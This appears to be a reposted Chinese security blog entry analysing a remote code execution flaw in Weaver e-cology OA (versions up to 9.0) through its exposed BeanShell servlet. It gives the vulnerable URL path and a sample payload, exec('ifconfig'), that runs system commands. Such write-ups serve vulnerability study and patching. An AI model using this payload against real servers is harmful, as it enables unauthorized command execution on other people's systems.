泛微 e-cology远程代码执行漏洞

本文转载自查看原文 2019-09-20 17:02 2070 渗透测试

影响版本：泛微 e-cology<=9.0

漏洞分析：　　　　

问题出现在 resin 下 lib 中的 bsh.jar 文件里，问题类 bsh.servlet.BshServlet，可 doGet 方法从 getParameter 中接收参数， Request 请求会交给evalScript 方法来进行处理。

参数传递

doGet--》getParameter--》 evalScript--》 localInterpreter.eval

漏洞利用：访问 http://url/weaver/bsh.servlet.BshServleth

输入payload

exec("ifconfig")

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 泛微e-cology系统远程代码执行漏洞泛微e-cology OA 远程代码执行漏洞泛微E-cology OA /weaver/ 代码执行漏洞泛微e-cology OA 远程代码执行漏洞复现泛微e-cology OA系统远程代码执行漏洞及其复现泛微 e-cology OA 远程代码执行漏洞复现泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041 泛微OA E-cology（CNVD-2019-32204）远程命令执行漏洞复现分析泛微 e-cology OA 前台SQL注入漏洞泛微 e-cology OA 前台SQL注入